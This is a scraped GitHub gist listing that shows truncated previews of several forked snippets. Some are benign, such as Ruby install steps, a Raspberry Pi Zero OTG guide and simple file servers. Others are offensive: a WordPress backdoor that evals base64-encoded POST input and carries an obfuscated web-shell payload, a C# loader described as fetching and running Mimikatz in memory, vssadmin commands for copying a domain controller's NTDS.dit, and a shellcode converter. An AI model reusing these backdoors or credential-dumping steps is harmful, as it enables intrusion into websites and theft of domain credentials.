iamtutu iamtutu

@iamtutu
iamtutu / gist:427e0f46d0de75fda02e98fb2bb66225
Created July 21, 2016 12:31 — forked from scmx/upgrade-install-ruby-2-1-2-ubuntu-12-04.md
Upgrade/Install ruby 2.1.2 #ubuntu #12.04 #14.04
# Reference http://stackoverflow.com/a/18490935/2037928
# Login as root
# Install needed packages
apt-get -y install build-essential zlib1g-dev libssl-dev libreadline6-dev libyaml-dev
cd /tmp
# Download appropriate ruby version https://www.ruby-lang.org/en/downloads/
@iamtutu
iamtutu / wordpressRootKit
Created August 10, 2016 06:23 — forked from jdeagle/wordpressRootKit
Wordpress root kit
// Injected VIA
<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>
<?php
$ref = $_SERVER['HTTP_USER_AGENT'];
$keywordsRegex = "/AtOPvMzpDosdPDlkm3ZmPzxoP/i";
if (preg_match($keywordsRegex, $ref)) {
$a='bas'.'e6'.'4_d'.'ecode';eval($a("QGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7DQpAaW5pX3NldCgnbG9nX2Vycm9ycycsMCk7DQpA
aW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsNCkBzZXRfdGltZV9saW1pdCgwKTsNCkBz
ZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7DQpAZGVmaW5lKCdXU09fVkVSU0lPTicsICcyLjUn
KTsNCg0KaWYoZ2V0X21hZ2ljX3F1b3Rlc19ncGMoKSkgew0KCWZ1bmN0aW9uIFdTT3N0cmlwc2xh
@iamtutu
iamtutu / netkatz.cs
Created August 12, 2016 11:57
Downloads and Executes Mimikatz In Memory From GitHub
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.
Extract NTDS/SYSTEM from a domain controller:
net start vss
vssadmin create shadow /for=c:
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
@iamtutu
iamtutu / HowToOTGFast.md
Created November 29, 2016 08:54 — forked from gbaman/HowToOTGFast.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!

### Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)
More details - http://blog.gbaman.info/?p=791

For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.
3. Finally, open up the cmdline.txt. Be careful with this file, it is very picky with its formatting! Each parameter is separated by a single

@iamtutu
iamtutu / HowToOTG.md
Created November 29, 2016 08:54 — forked from gbaman/HowToOTG.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero

Raspberry Pi Zero OTG Mode

Simple guide for setting up OTG modes on the Raspberry Pi Zero - By Andrew Mulholland (gbaman).

The Raspberry Pi Zero (and model A and A+) support USB On The Go, given the processor is connected directly to the USB port, unlike on the B, B+ or Pi 2 B, which goes via a USB hub.
Because of this, if set up to do so, the Pi can act as a USB slave instead, providing virtual serial (a terminal), virtual ethernet, virtual mass storage device (pendrive) or even other virtual devices like HID, MIDI, or act as a virtual webcam!
It is important to note that, although the model A and A+ can support being a USB slave, they are missing the ID pin (it is tied to ground internally) so are unable to dynamically switch between USB master/slave mode. As such, they default to USB master mode. There is no easy way to change this right now.
It is also important to note that a USB to UART serial adapter is not needed for any of these guides, as may be documented elsewhere across the int

@iamtutu
iamtutu / bin2sc.py
Created May 10, 2017 18:22 — forked from superkojiman/bin2sc.py
Convert bin to shellcode.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "usage: %s file.bin\n" % (sys.argv[0],)
        sys.exit(0)
    shellcode = "\""
    ctr = 1
    maxlen = 15
@iamtutu
iamtutu / ftpserver.py
Created July 4, 2017 10:50 — forked from scturtle/ftpserver.py
simple ftp server by python
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
#import traceback
allow_delete = False
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 8888
currdir=os.path.abspath('.')
@iamtutu
iamtutu / web-servers.md
Created July 4, 2017 11:48 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
<?php
/**
* @author Matt Korostoff <mkorostoff@gmail.com>
*
* @copyright Licensed under the GNU General Public License as published by the Free
* Software Foundation, either version 3 of the License, or (at your option)
* any later version. http://www.gnu.org/licenses/
*
* @usage php path/to/this/file.php 'http://example.com'
*/